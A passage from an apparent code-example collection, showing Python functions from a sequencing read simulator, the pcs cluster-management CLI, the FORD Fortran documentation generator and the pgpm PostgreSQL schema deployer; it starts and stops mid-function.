        if mean=='emp':
            inters=[]
            for k in keys:
                inters.append((k,intervals[k]))
            interval=bisect_choiceTUP(inters)
        #inserts1and2
        insDict1=mkInserts(mx1,insD1)
        insDict2=mkInserts(mx2,insD2)
        #deletions1and2
        delDict1=mkDels(mx1,delD1)
        delDict2=mkDels(mx2,delD2)
    #choose good quality bases
    gQList=[]             
    for i in (gQualL):
        gL=[]
        keys=i.keys()
        keys.sort()
        for k in keys:
            gL.append((chr(k+qual),i[k]))
        gQList.append(bisect_choiceTUP(gL))
    #choose bad quality bases
    bQList=[]
    for i in (bQualL):
        bL=[]
        keys=i.keys()
        keys.sort()
        for k in keys:
            bL.append((chr(k+qual),i[k]))
        bQList.append(bisect_choiceTUP(bL))
    #choose qualities for inserts
    iQList=[]
    for i in (iQualL):
        iL=[] 
        keys=i.keys()
        keys.sort()
        for k in keys:
            iL.append((chr(k+qual),i[k]))
        iQList.append(bisect_choiceTUP(iL))
    #choose read length
    if length=='d':
        rdlog.info('Using empirical read length distribution')
        lgth=[]
        keys=rdLenD.keys()
        keys.sort()
        for k in keys:
            lgth.append((k,rdLenD[k]))
        length=bisect_choiceTUP(lgth)
    else:
        length=ln(length)
    #choose reference
    genDict={}
    if meta:
        refDict,genDict,comDict,refList=getMet(direct,genDirect, abund)
    else:
        if gens!='':
            gens=gParse(gens)
            gens=bisect_gens(gens)
        else:
            gens=genRef('')
        refDict,comDict,refList=getRef(refFile)
        genDict[refFile]=gens
    reference=bisect_choiceTUP(refList)
    count=1
    #track read origin
    readOri={}
    for r,c in refList:
        readOri[r]=0    
    while count<=number:
        hd=reference()
        ref,refFile=refDict[hd]
        cRef=comDict[hd] 
        readOri[hd]+=1
        refLen=len(ref)
        if not paired:
            readLen=length()
            read1,pos,dir,quals1=readGen1(ref,cRef,refLen,readLen,genDict[refFile](),readLen,mx1,insDict,delDict,gQList,bQList,iQList,qual,circular,hd)
            head1='@'+'r'+str(count)+'_from_'+hd+'_#0/1\n'
        else:
            val=random.random()
            ln1=length()
            ln2=length()
            if mean=='emp':
                inter=interval()
            else:
                inter=int(random.normalvariate(mean,stdv))
            while (inter+ln1+ln2) > refLen*.9 or inter<ln1*1.5:
                if mean=='emp':
                    inter=interval()
                else:
                    inter=int(random.normalvariate(mean,stdv))
            if val > unAlign0+unAlign1:        
                read1,pos,dir,quals1=readGen1(ref,cRef,refLen,ln1,genDict[refFile](),inter,mx1,insDict1,delDict1,gQList,bQList,iQList,qual,circular,hd)
                read2,quals2=readGen2(ref,cRef,pos, dir, ln2, genDict[refFile](),inter,mx2,insDict2,delDict2,gQList,bQList,iQList,qual,circular,hd)
                p1=pos
                p2=pos+inter-ln2+1
            elif val > unAlign1:
                read1,pos,dir,quals1=readGen1(ref,cRef,refLen,ln1,genDict[refFile](),inter,mx1,insDict1,delDict1,gQList,bQList,iQList,qual,circular,hd)
                read2='N'*ln2
                quals2=chr(0+qual)*ln2
                p1=pos
                p2='*'
            else:
                read1,pos,dir,quals1=readGen1(ref,cRef,refLen,ln1,genDict[refFile](),inter,mx1,insDict1,delDict1,gQList,bQList,iQList,qual,circular,hd)
                read2,quals2=readGen2(ref,cRef,pos, dir, ln2,genDict[refFile](),inter,mx2,insDict2,delDict2,gQList,bQList,iQList,qual,circular,hd)
                read1='N'*ln1
                quals1=chr(0+qual)*ln1
                p1='*'
                p2=pos+inter-ln2+1
            head1='@'+'r'+str(count)+'_from_'+hd+'_ln'+str(inter)+'_#0/1\n'
            head2='@'+'r'+str(count)+'_from_'+hd+'_ln'+str(inter)+'_#0/2\n'
        out1.write(head1)
        out1.write(read1+'\n')
        out1.write('+\n')
        out1.write(quals1+'\n')
        if paired:
            out2.write(head2)
            out2.write(read2+'\n')
            out2.write('+\n')
            out2.write(quals2+'\n')
        count+=1
        if count%5000==0:
            if paired:
                rdlog.info('...simulated '+str(count)+' read pairs.')
            else:
                rdlog.info('...simulated '+str(count)+' single reads.')
    key=readOri.keys()
    key.sort()
    for k in key:
        rdlog.info('Simulated '+str(readOri[k])+' reads from reference '+k)

Example 27

Project: pcs
Source File: app.py
View license
def main(argv=None):
    if completion.has_applicable_environment(os.environ):
        print(completion.make_suggestions(
            os.environ,
            usage.generate_completion_tree_from_usage()
        ))
        sys.exit()

    argv = argv if argv else sys.argv[1:]
    utils.subprocess_setup()
    global filename, usefile
    orig_argv = argv[:]
    utils.pcs_options = {}
    modified_argv = []
    real_argv = []
    try:
        # we change --cloneopt to "clone" for backwards compatibility
        new_argv = []
        for arg in argv:
            if arg == "--cloneopt" or arg == "--clone":
                new_argv.append("clone")
            elif arg.startswith("--cloneopt="):
                new_argv.append("clone")
                new_argv.append(arg.split('=',1)[1])
            else:
                new_argv.append(arg)
        argv = new_argv

        # we want to support optional arguments for --wait, so if an argument
        # is specified with --wait (ie. --wait=30) then we use them
        waitsecs = None
        new_argv = []
        for arg in argv:
            if arg.startswith("--wait="):
                tempsecs = arg.replace("--wait=","")
                if len(tempsecs) > 0:
                    waitsecs = tempsecs
                    arg = "--wait"
            new_argv.append(arg)
        argv = new_argv

        # h = help, f = file,
        # p = password (cluster auth), u = user (cluster auth),
        # V = verbose (cluster verify)
        pcs_short_options = "hf:p:u:V"
        pcs_long_options = [
            "debug", "version", "help", "fullhelp",
            "force", "skip-offline", "autocorrect", "interactive", "autodelete",
            "all", "full", "groups", "local", "wait", "config",
            "start", "enable", "disabled", "off",
            "pacemaker", "corosync",
            "no-default-ops", "defaults", "nodesc",
            "clone", "master", "name=", "group=", "node=",
            "from=", "to=", "after=", "before=",
            "transport=", "rrpmode=", "ipv6",
            "addr0=", "bcast0=", "mcast0=", "mcastport0=", "ttl0=", "broadcast0",
            "addr1=", "bcast1=", "mcast1=", "mcastport1=", "ttl1=", "broadcast1",
            "wait_for_all=", "auto_tie_breaker=", "last_man_standing=",
            "last_man_standing_window=",
            "token=", "token_coefficient=", "consensus=", "join=",
            "miss_count_const=", "fail_recv_const=",
            "corosync_conf=", "cluster_conf=",
            "booth-conf=", "booth-key=",
            "remote", "watchdog=",
            #in pcs status - do not display resorce status on inactive node
            "hide-inactive",
        ]
        # pull out negative number arguments and add them back after getopt
        prev_arg = ""
        for arg in argv:
            if len(arg) > 0 and arg[0] == "-":
                if arg[1:].isdigit() or arg[1:].startswith("INFINITY"):
                    real_argv.append(arg)
                else:
                    modified_argv.append(arg)
            else:
                # If previous argument required an argument, then this arg
                # should not be added back in
                if not prev_arg or (not (prev_arg[0] == "-" and prev_arg[1:] in pcs_short_options) and not (prev_arg[0:2] == "--" and (prev_arg[2:] + "=") in pcs_long_options)):
                    real_argv.append(arg)
                modified_argv.append(arg)
            prev_arg = arg

        pcs_options, argv = getopt.gnu_getopt(modified_argv, pcs_short_options, pcs_long_options)
    except getopt.GetoptError as err:
        print(err)
        usage.main()
        sys.exit(1)
    argv = real_argv
    for o, a in pcs_options:
        if not o in utils.pcs_options:
            if o == "--watchdog":
                a = [a]
            utils.pcs_options[o] = a
        else:
            # If any options are a list then they've been entered twice which isn't valid
            if o != "--watchdog":
                utils.err("%s can only be used once" % o)
            else:
                utils.pcs_options[o].append(a)

        if o == "-h" or o == "--help":
            if len(argv) == 0:
                usage.main()
                sys.exit()
            else:
                argv = [argv[0], "help" ] + argv[1:]
        elif o == "-f":
            usefile = True
            filename = a
            utils.usefile = usefile
            utils.filename = filename
        elif o == "--corosync_conf":
            settings.corosync_conf_file = a
        elif o == "--cluster_conf":
            settings.cluster_conf_file = a
        elif o == "--version":
            print(settings.pcs_version)
            sys.exit()
        elif o == "--fullhelp":
            usage.full_usage()
            sys.exit()
        elif o == "--wait":
            utils.pcs_options[o] = waitsecs

    if len(argv) == 0:
        usage.main()
        sys.exit(1)

    # create a dummy logger
    # we do not have a log file for cli (yet), but library requires a logger
    logger = logging.getLogger("old_cli")
    logger.propagate = 0
    logger.handlers = []

    command = argv.pop(0)
    if (command == "-h" or command == "help"):
        usage.main()
        return
    cmd_map = {
        "resource": resource.resource_cmd,
        "cluster": cluster.cluster_cmd,
        "stonith": stonith.stonith_cmd,
        "property": prop.property_cmd,
        "constraint": constraint.constraint_cmd,
        "acl": lambda argv: acl.acl_cmd(
            utils.get_library_wrapper(),
            argv,
            utils.get_modificators()
        ),
        "status": status.status_cmd,
        "config": config.config_cmd,
        "pcsd": pcsd.pcsd_cmd,
        "node": node.node_cmd,
        "quorum": lambda argv: quorum.quorum_cmd(
            utils.get_library_wrapper(),
            argv,
            utils.get_modificators()
        ),
        "qdevice": lambda argv: qdevice.qdevice_cmd(
            utils.get_library_wrapper(),
            argv,
            utils.get_modificators()
        ),
        "alert": lambda args: alert.alert_cmd(
            utils.get_library_wrapper(),
            args,
            utils.get_modificators()
        ),
        "booth": lambda argv: booth.booth_cmd(
            utils.get_library_wrapper(),
            argv,
            utils.get_modificators()
        ),
    }
    if command not in cmd_map:
        usage.main()
        sys.exit(1)
    # root can run everything directly, also help can be displayed,
    # working on a local file also do not need to run under root
    if (os.getuid() == 0) or (argv and argv[0] == "help") or usefile:
        cmd_map[command](argv)
        return
    # specific commands need to be run under root account, pass them to pcsd
    # don't forget to allow each command in pcsd.rb in "post /run_pcs do"
    root_command_list = [
        ['cluster', 'auth', '...'],
        ['cluster', 'corosync', '...'],
        ['cluster', 'destroy', '...'],
        ['cluster', 'disable', '...'],
        ['cluster', 'enable', '...'],
        ['cluster', 'node', '...'],
        ['cluster', 'pcsd-status', '...'],
        ['cluster', 'setup', '...'],
        ['cluster', 'start', '...'],
        ['cluster', 'stop', '...'],
        ['cluster', 'sync', '...'],
        # ['config', 'restore', '...'], # handled in config.config_restore
        ['pcsd', 'sync-certificates'],
        ['status', 'nodes', 'corosync-id'],
        ['status', 'nodes', 'pacemaker-id'],
        ['status', 'pcsd', '...'],
    ]
    argv_cmd = argv[:]
    argv_cmd.insert(0, command)
    for root_cmd in root_command_list:
        if (
            (argv_cmd == root_cmd)
            or
            (
                root_cmd[-1] == "..."
                and
                argv_cmd[:len(root_cmd)-1] == root_cmd[:-1]
            )
        ):
            # handle interactivity of 'pcs cluster auth'
            if argv_cmd[0:2] == ["cluster", "auth"]:
                if "-u" not in utils.pcs_options:
                    username = utils.get_terminal_input('Username: ')
                    orig_argv.extend(["-u", username])
                if "-p" not in utils.pcs_options:
                    password = utils.get_terminal_password()
                    orig_argv.extend(["-p", password])

            # call the local pcsd
            err_msgs, exitcode, std_out, std_err = utils.call_local_pcsd(
                orig_argv, True
            )
            if err_msgs:
                for msg in err_msgs:
                    utils.err(msg, False)
                sys.exit(1)
            if std_out.strip():
                print(std_out)
            if std_err.strip():
                sys.stderr.write(std_err)
            sys.exit(exitcode)
            return
    cmd_map[command](argv)

Example 28

Project: ford
Source File: __init__.py
View license
def initialize():
    """
    Method to parse and check configurations of FORD, get the project's 
    global documentation, and create the Markdown reader.
    """
    # Setup the command-line options and parse them.
    parser = argparse.ArgumentParser(description="Document a program or library written in modern Fortran. Any command-line options over-ride those specified in the project file.")
    parser.add_argument("project_file",help="file containing the description and settings for the project",
                        type=argparse.FileType('r'))
    parser.add_argument("-d","--src_dir",action="append",help='directories containing all source files for the project')
    parser.add_argument("-p","--page_dir",help="directory containing the optional page tree describing the project")
    parser.add_argument("-o","--output_dir",help="directory in which to place output files")
    parser.add_argument("-s","--css",help="custom style-sheet for the output")
    parser.add_argument("--exclude",action="append",help="any files which should not be included in the documentation")
    parser.add_argument("--exclude_dir",action="append",help="any directories whose contents should not be included in the documentation")
    parser.add_argument("-e","--extensions",action="append",help="extensions which should be scanned for documentation (default: f90, f95, f03, f08)")
    parser.add_argument("-m","--macro",action="append",help="preprocessor macro (and, optionally, its value) to be applied to files in need of preprocessing.")
    parser.add_argument("-w","--warn",dest='warn',action='store_true',
                        help="display warnings for undocumented items")
    parser.add_argument("--no-search",dest='search',action='store_false',
                        help="don't process documentation to produce a search feature")
    parser.add_argument("-q","--quiet",dest='quiet',action='store_true',
                        help="do not print any description of progress")
    parser.add_argument("-V", "--version", action="version",
                        version="{}, version {}".format(__appname__,__version__))
    parser.add_argument("--debug",dest="dbg",action="store_true",
                        help="display traceback if fatal exception occurs")
    parser.add_argument("-I","--include",action="append",
                        help="any directories which should be searched for include files")
    # Get options from command-line
    args = parser.parse_args()
    # Set up Markdown reader
    md_ext = ['markdown.extensions.meta','markdown.extensions.codehilite',
              'markdown.extensions.extra',MathJaxExtension(),'md_environ.environ']
    md = markdown.Markdown(extensions=md_ext, output_format="html5",
    extension_configs={})
    # Read in the project-file. This will contain global documentation (which
    # will appear on the homepage) as well as any information about the project
    # and settings for generating the documentation.
    proj_docs = args.project_file.read()
    md.convert(proj_docs)
    # Remake the Markdown object with settings parsed from the project_file
    if 'md_base_dir' in md.Meta: md_base = md.Meta['md_base_dir'][0] 
    else: md_base = os.path.dirname(args.project_file.name)
    md_ext.append('markdown_include.include')
    if 'md_extensions' in md.Meta: md_ext.extend(md.Meta['md_extensions'])
    md = markdown.Markdown(extensions=md_ext, output_format="html5",
            extension_configs={'markdown_include.include': {'base_path': md_base}})
    md.reset()
    # Re-read the project file
    proj_docs = md.convert(proj_docs)
    proj_data = md.Meta
    md.reset()
    # Get the default options, and any over-rides, straightened out
    options = ['src_dir','extensions','fpp_extensions','fixed_extensions',
               'output_dir','css','exclude',
               'project','author','author_description','author_pic',
               'summary','github','bitbucket','facebook','twitter',
               'google_plus','linkedin','email','website','project_github',
               'project_bitbucket','project_website','project_download',
               'project_sourceforge','project_url','display','version',
               'year','docmark','predocmark','docmark_alt','predocmark_alt',
               'media_dir','favicon','warn','extra_vartypes','page_dir',
               'source','exclude_dir','macro','include','preprocess','quiet',
               'search','lower','sort','extra_mods','dbg','graph', 'license',
               'extra_filetypes','preprocessor','creation_date',
               'print_creation_date','proc_internals','coloured_edges',
               'graph_dir','gitter_sidecar']
    defaults = {'src_dir':             ['./src'],
                'extensions':          ['f90','f95','f03','f08','f15'],
                'fpp_extensions':      ['F90','F95','F03','F08','F15','F','FOR'],
                'fixed_extensions':    ['f','for','F','FOR'],
                'output_dir':          './doc',
                'project':             'Fortran Program',
                'project_url':         '',
                'display':             ['public','protected'],
                'year':                date.today().year,
                'exclude':             [],
                'exclude_dir':         [],
                'docmark':             '!',
                'docmark_alt':         '*',
                'predocmark':          '>',
                'predocmark_alt':      '|',
                'favicon':             'default-icon',
                'extra_vartypes':      [],
                'source':              'false',
                'macro':               [],
                'include':             [],
                'preprocess':          'true',
                'preprocessor':        '',
                'proc_internals':      'false',
                'warn':                'false',
                'quiet':               'false',
                'search':              'true',
                'lower':               'false',
                'sort':                'src',
                'extra_mods':          [],
                'dbg':                 False,
                'graph':               'false',
                'license':             '',
                'extra_filetypes':     [],
                'creation_date':       '%Y-%m-%dT%H:%M:%S.%f%z',
                'print_creation_date': False,
                'coloured_edges':      'false',
               }
    listopts = ['extensions','fpp_extensions','fixed_extensions','display',
                'extra_vartypes','src_dir','exclude','exclude_dir',
                'macro','include','extra_mods','extra_filetypes']
    # Evaluate paths relative to project file location
    base_dir = os.path.abspath(os.path.dirname(args.project_file.name))
    proj_data['base_dir'] = base_dir
    for var in ['src_dir','page_dir','output_dir','exclude_dir','graph_dir','media_dir','include','favicon','css']:
        if var in proj_data:
            proj_data[var] = [os.path.normpath(os.path.join(base_dir,os.path.expanduser(os.path.expandvars(p)))) for p in proj_data[var]]
    if args.warn:
        args.warn = 'true'
    else:
        del args.warn
    if args.quiet:
        args.quiet = 'true'
    else:
        del args.quiet
    if not args.search:
        args.search = 'false'
    else:
        del args.search
    for option in options:
        if hasattr(args,option) and getattr(args,option):
            proj_data[option] = getattr(args,option)
        elif option in proj_data:
            # Think if there is a safe  way to evaluate any expressions found in this list
            #proj_data[option] = proj_data[option]
            if option not in listopts:
                proj_data[option] = '\n'.join(proj_data[option])
        elif option in defaults:
           proj_data[option] = defaults[option]
    proj_data['display'] = [ item.lower() for item in proj_data['display'] ]
    proj_data['creation_date'] = datetime.now().strftime(proj_data['creation_date'])
    relative = (proj_data['project_url'] == '')
    proj_data['relative'] = relative
    proj_data['extensions'] += [ext for ext in proj_data['fpp_extensions'] if ext not in proj_data['extensions']]
    # Parse file extensions and comment characters for extra filetypes
    extdict = {}
    for ext in proj_data['extra_filetypes']:
        sp = ext.split()
        if len(sp) < 2: continue
        extdict[sp[0]] = sp[1]
    proj_data['extra_filetypes'] = extdict
    # Make sure no src_dir is contained within output_dir
    for projdir in proj_data['src_dir']:
        proj_path = ford.utils.split_path(projdir)
        out_path  = ford.utils.split_path(proj_data['output_dir'])
        for directory in out_path:
            if len(proj_path) ==  0: break
            if directory == proj_path[0]:
                proj_path.remove(directory)
            else:
                break
        else:
            print('Error: directory containing source-code {} a subdirectory of output directory {}.'.format(proj_data['output_dir'],projdir))
            sys.exit(1)
    # Check that none of the docmarks are the same
    if proj_data['docmark'] == proj_data['predocmark'] != '':
        print('Error: docmark and predocmark are the same.')
        sys.exit(1)
    if proj_data['docmark'] == proj_data['docmark_alt'] != '':
        print('Error: docmark and docmark_alt are the same.')
        sys.exit(1)
    if proj_data['docmark'] == proj_data['predocmark_alt'] != '':
        print('Error: docmark and predocmark_alt are the same.')
        sys.exit(1)
    if proj_data['docmark_alt'] == proj_data['predocmark'] != '':
        print('Error: docmark_alt and predocmark are the same.')
        sys.exit(1)
    if proj_data['docmark_alt'] == proj_data['predocmark_alt'] != '':
        print('Error: docmark_alt and predocmark_alt are the same.')
        sys.exit(1)
    if proj_data['predocmark'] == proj_data['predocmark_alt'] != '':
        print('Error: predocmark and predocmark_alt are the same.')
        sys.exit(1)
    # Add gitter sidecar if specified in metadata
    if 'gitter_sidecar' in proj_data:
        proj_docs += '''
        <script>
            ((window.gitter = {{}}).chat = {{}}).options = {{
            room: '{}'
            }};
        </script>
        <script src="https://sidecar.gitter.im/dist/sidecar.v1.js" async defer></script>
        '''.format(proj_data['gitter_sidecar'].strip())
    # Handle preprocessor:
    if proj_data['preprocess'].lower() == 'true':
        if proj_data['preprocessor']:
            preprocessor = proj_data['preprocessor'].split()
        else:
            preprocessor = ['cpp','-traditional-cpp','-E', '-D__GFORTRAN__']

        # Check whether preprocessor works (reading nothing from stdin)
        try:
            devnull = open(os.devnull)
            subprocess.Popen(preprocessor, stdin=devnull, stdout=devnull,
                             stderr=devnull).communicate()
        except OSError as ex:
            print('Warning: Testing preprocessor failed')
            print('  Preprocessor command: {}'.format(preprocessor))
            print('  Exception: {}'.format(ex))
            print('  -> Preprocessing turned off')
            proj_data['preprocess'] = 'false'
        else:
            proj_data['preprocess'] = 'true'
            proj_data['preprocessor'] = preprocessor
    
    # Get correct license
    try:
        proj_data['license'] = LICENSES[proj_data['license'].lower()]
    except KeyError:
        print('Warning: license "{}" not recognized.'.format(proj_data['license']))
        proj_data['license'] = ''
    # Return project data, docs, and the Markdown reader
    md.reset()
    md.Meta = {}
    return (proj_data, proj_docs, md)

Example 29

Project: pgpm
Source File: deploy.py
View license
    def deploy_schema_to_db(self, mode='safe', files_deployment=None, vcs_ref=None, vcs_link=None,
                            issue_ref=None, issue_link=None, compare_table_scripts_as_int=False,
                            config_path=None, config_dict=None, config_object=None, source_code_path=None,
                            auto_commit=False):
        """
        Deploys schema
        :param files_deployment: if specific script to be deployed, only find them
        :param mode:
        :param vcs_ref:
        :param vcs_link:
        :param issue_ref:
        :param issue_link:
        :param compare_table_scripts_as_int:
        :param config_path:
        :param config_dict:
        :param config_object:
        :param source_code_path:
        :param auto_commit:
        :return: dictionary of the following format:
            {
                code: 0 if all fine, otherwise something else,
                message: message on the output
                function_scripts_requested: list of function files requested for deployment
                function_scripts_deployed: list of function files deployed
                type_scripts_requested: list of type files requested for deployment
                type_scripts_deployed: list of type files deployed
                view_scripts_requested: list of view files requested for deployment
                view_scripts_deployed: list of view files deployed
                trigger_scripts_requested: list of trigger files requested for deployment
                trigger_scripts_deployed: list of trigger files deployed
                table_scripts_requested: list of table files requested for deployment
                table_scripts_deployed: list of table files deployed
                requested_files_count: count of requested files to deploy
                deployed_files_count: count of deployed files
            }
        :rtype: dict
        """

        return_value = {}
        if files_deployment:
            return_value['function_scripts_requested'] = files_deployment
            return_value['type_scripts_requested'] = []
            return_value['view_scripts_requested'] = []
            return_value['trigger_scripts_requested'] = []
            return_value['table_scripts_requested'] = []

        if auto_commit:
            if mode == 'safe' and files_deployment:
                self._logger.debug("Auto commit mode is on. Be careful.")
            else:
                self._logger.error("Auto commit deployment can only be done with file "
                                   "deployments and in safe mode for security reasons")
                raise ValueError("Auto commit deployment can only be done with file "
                                 "deployments and in safe mode for security reasons")

        # set source code path if exists
        self._source_code_path = self._source_code_path or source_code_path

        # set configuration if either of config_path, config_dict, config_object are set.
        # Otherwise use configuration from class initialisation
        if config_object:
            self._config = config_object
        elif config_path or config_dict:
            self._config = pgpm.lib.utils.config.SchemaConfiguration(config_path, config_dict, self._source_code_path)

        # Check if in git repo
        if not vcs_ref:
            if pgpm.lib.utils.vcs.is_git_directory(self._source_code_path):
                vcs_ref = pgpm.lib.utils.vcs.get_git_revision_hash(self._source_code_path)
                self._logger.debug('commit reference to be deployed is {0}'.format(vcs_ref))
            else:
                self._logger.debug('Folder is not a known vcs repository')

        self._logger.debug('Configuration of package {0} of version {1} loaded successfully.'
                           .format(self._config.name, self._config.version.raw))  # TODO: change to to_string once discussed
        # .format(self._config.name, self._config.version.to_string()))

        # Get scripts
        type_scripts_dict = self._get_scripts(self._config.types_path, files_deployment,
                                              "types", self._source_code_path)
        if not files_deployment:
            return_value['type_scripts_requested'] = [key for key in type_scripts_dict]

        function_scripts_dict = self._get_scripts(self._config.functions_path, files_deployment,
                                                  "functions", self._source_code_path)
        if not files_deployment:
            return_value['function_scripts_requested'] = [key for key in function_scripts_dict]

        view_scripts_dict = self._get_scripts(self._config.views_path, files_deployment,
                                              "views", self._source_code_path)
        if not files_deployment:
            return_value['view_scripts_requested'] = [key for key in view_scripts_dict]

        trigger_scripts_dict = self._get_scripts(self._config.triggers_path, files_deployment,
                                                 "triggers", self._source_code_path)
        if not files_deployment:
            return_value['trigger_scripts_requested'] = [key for key in trigger_scripts_dict]

        # before with table scripts only file name was an identifier. Now whole relative path the file
        # (relative to config.json)
        # table_scripts_dict_denormalised = self._get_scripts(self._config.tables_path, files_deployment,
        #                                                     "tables", self._source_code_path)
        # table_scripts_dict = {os.path.split(k)[1]: v for k, v in table_scripts_dict_denormalised.items()}
        table_scripts_dict = self._get_scripts(self._config.tables_path, files_deployment,
                                               "tables", self._source_code_path)
        if not files_deployment:
            return_value['table_scripts_requested'] = [key for key in table_scripts_dict]

        if self._conn.closed:
            self._conn = psycopg2.connect(self._connection_string, connection_factory=pgpm.lib.utils.db.MegaConnection)
        cur = self._conn.cursor()

        # be cautious, dangerous thing
        if auto_commit:
            self._conn.autocommit = True

        # Check if DB is pgpm enabled
        if not pgpm.lib.utils.db.SqlScriptsHelper.schema_exists(cur, self._pgpm_schema_name):
            self._logger.error('Can\'t deploy schemas to DB where pgpm was not installed. '
                               'First install pgpm by running pgpm install')
            self._conn.close()
            sys.exit(1)

        # check installed version of _pgpm schema.
        pgpm_v_db_tuple = pgpm.lib.utils.db.SqlScriptsHelper.get_pgpm_db_version(cur, self._pgpm_schema_name)
        pgpm_v_db = distutils.version.StrictVersion(".".join(pgpm_v_db_tuple))
        pgpm_v_script = distutils.version.StrictVersion(pgpm.lib.version.__version__)
        if pgpm_v_script > pgpm_v_db:
            self._logger.error('{0} schema version is outdated. Please run pgpm install --upgrade first.'
                               .format(self._pgpm_schema_name))
            self._conn.close()
            sys.exit(1)
        elif pgpm_v_script < pgpm_v_db:
            self._logger.error('Deployment script\'s version is lower than the version of {0} schema '
                               'installed in DB. Update pgpm script first.'.format(self._pgpm_schema_name))
            self._conn.close()
            sys.exit(1)

        # Resolve dependencies
        list_of_deps_ids = []
        if self._config.dependencies:
            _is_deps_resolved, list_of_deps_ids, _list_of_unresolved_deps = \
                self._resolve_dependencies(cur, self._config.dependencies)
            if not _is_deps_resolved:
                self._logger.error('There are unresolved dependencies. Deploy the following package(s) and try again:')
                for unresolved_pkg in _list_of_unresolved_deps:
                    self._logger.error('{0}'.format(unresolved_pkg))
                self._conn.close()
                sys.exit(1)

        # Prepare and execute preamble
        _deployment_script_preamble = pkgutil.get_data('pgpm', 'lib/db_scripts/deploy_prepare_config.sql')
        self._logger.debug('Executing a preamble to deployment statement')
        cur.execute(_deployment_script_preamble)

        # Get schema name from project configuration
        schema_name = ''
        if self._config.scope == pgpm.lib.utils.config.SchemaConfiguration.SCHEMA_SCOPE:
            if self._config.subclass == 'versioned':
                schema_name = '{0}_{1}'.format(self._config.name, self._config.version.raw)

                self._logger.debug('Schema {0} will be updated'.format(schema_name))
            elif self._config.subclass == 'basic':
                schema_name = '{0}'.format(self._config.name)
                if not files_deployment:
                    self._logger.debug('Schema {0} will be created/replaced'.format(schema_name))
                else:
                    self._logger.debug('Schema {0} will be updated'.format(schema_name))

        # Create schema or update it if exists (if not in production mode) and set search path
        if files_deployment:  # if specific scripts to be deployed
            if self._config.scope == pgpm.lib.utils.config.SchemaConfiguration.SCHEMA_SCOPE:
                if not pgpm.lib.utils.db.SqlScriptsHelper.schema_exists(cur, schema_name):
                    self._logger.error('Can\'t deploy scripts to schema {0}. Schema doesn\'t exist in database'
                                       .format(schema_name))
                    self._conn.close()
                    sys.exit(1)
                else:
                    pgpm.lib.utils.db.SqlScriptsHelper.set_search_path(cur, schema_name)
                    self._logger.debug('Search_path was changed to schema {0}'.format(schema_name))
        else:
            if self._config.scope == pgpm.lib.utils.config.SchemaConfiguration.SCHEMA_SCOPE:
                if not pgpm.lib.utils.db.SqlScriptsHelper.schema_exists(cur, schema_name):
                    pgpm.lib.utils.db.SqlScriptsHelper.create_db_schema(cur, schema_name)
                elif mode == 'safe':
                    self._logger.error('Schema already exists. It won\'t be overriden in safe mode. '
                                       'Rerun your script with "-m moderate", "-m overwrite" or "-m unsafe" flags')
                    self._conn.close()
                    sys.exit(1)
                elif mode == 'moderate':
                    old_schema_exists = True
                    old_schema_rev = 0
                    while old_schema_exists:
                        old_schema_exists = pgpm.lib.utils.db.SqlScriptsHelper.schema_exists(
                            cur, schema_name + '_' + str(old_schema_rev))
                        if old_schema_exists:
                            old_schema_rev += 1
                    old_schema_name = schema_name + '_' + str(old_schema_rev)
                    self._logger.debug('Schema already exists. It will be renamed to {0} in moderate mode. Renaming...'
                                       .format(old_schema_name))
                    _rename_schema_script = "ALTER SCHEMA {0} RENAME TO {1};\n".format(schema_name, old_schema_name)
                    cur.execute(_rename_schema_script)
                    # Add metadata to pgpm schema
                    pgpm.lib.utils.db.SqlScriptsHelper.set_search_path(cur, self._pgpm_schema_name)
                    cur.callproc('_set_revision_package'.format(self._pgpm_schema_name),
                                 [self._config.name,
                                  self._config.subclass,
                                  old_schema_rev,
                                  self._config.version.major,
                                  self._config.version.minor,
                                  self._config.version.patch,
                                  self._config.version.pre])
                    self._logger.debug('Schema {0} was renamed to {1}. Meta info was added to {2} schema'
                                       .format(schema_name, old_schema_name, self._pgpm_schema_name))
                    pgpm.lib.utils.db.SqlScriptsHelper.create_db_schema(cur, schema_name)
                elif mode == 'unsafe':
                    _drop_schema_script = "DROP SCHEMA {0} CASCADE;\n".format(schema_name)
                    cur.execute(_drop_schema_script)
                    self._logger.debug('Dropping old schema {0}'.format(schema_name))
                    pgpm.lib.utils.db.SqlScriptsHelper.create_db_schema(cur, schema_name)

        if self._config.scope == pgpm.lib.utils.config.SchemaConfiguration.SCHEMA_SCOPE:
            pgpm.lib.utils.db.SqlScriptsHelper.set_search_path(cur, schema_name)

        # Reordering and executing types
        return_value['type_scripts_deployed'] = []
        if len(type_scripts_dict) > 0:
            types_script = '\n'.join([''.join(value) for key, value in type_scripts_dict.items()])
            type_drop_scripts, type_ordered_scripts, type_unordered_scripts = self._reorder_types(types_script)
            if type_drop_scripts:
                for statement in type_drop_scripts:
                    if statement:
                        cur.execute(statement)
            if type_ordered_scripts:
                for statement in type_ordered_scripts:
                    if statement:
                        cur.execute(statement)
            if type_unordered_scripts:
                for statement in type_unordered_scripts:
                    if statement:
                        cur.execute(statement)
            self._logger.debug('Types loaded to schema {0}'.format(schema_name))
            return_value['type_scripts_deployed'] = [key for key in type_scripts_dict]
        else:
            self._logger.debug('No type scripts to deploy')

        # Executing Table DDL scripts
        executed_table_scripts = []
        return_value['table_scripts_deployed'] = []
        if len(table_scripts_dict) > 0:
            if compare_table_scripts_as_int:
                sorted_table_scripts_dict = collections.OrderedDict(sorted(table_scripts_dict.items(),
                                                                           key=lambda t: int(t[0].rsplit('.', 1)[0])))
            else:
                sorted_table_scripts_dict = collections.OrderedDict(sorted(table_scripts_dict.items(),
                                                                           key=lambda t: t[0].rsplit('.', 1)[0]))

            self._logger.debug('Running Table DDL scripts')
            for key, value in sorted_table_scripts_dict.items():
                pgpm.lib.utils.db.SqlScriptsHelper.set_search_path(cur, self._pgpm_schema_name)
                cur.callproc('_is_table_ddl_executed'.format(self._pgpm_schema_name), [
                    key,
                    self._config.name,
                    self._config.subclass,
                    self._config.version.major,
                    self._config.version.minor,
                    self._config.version.patch,
                    self._config.version.pre
                ])
                is_table_executed = cur.fetchone()[0]
                if self._config.scope == pgpm.lib.utils.config.SchemaConfiguration.SCHEMA_SCOPE:
                    pgpm.lib.utils.db.SqlScriptsHelper.set_search_path(cur, schema_name)
                elif self._config.scope == pgpm.lib.utils.config.SchemaConfiguration.DATABASE_SCOPE:
                    cur.execute("SET search_path TO DEFAULT ;")
                if (not is_table_executed) or (mode == 'unsafe'):
                    # if auto commit mode than every statement is called separately.
                    # this is done this way as auto commit is normally used when non transaction statements are called
                    # then this is needed to avoid "cannot be executed from a function or multi-command string" errors
                    if auto_commit:
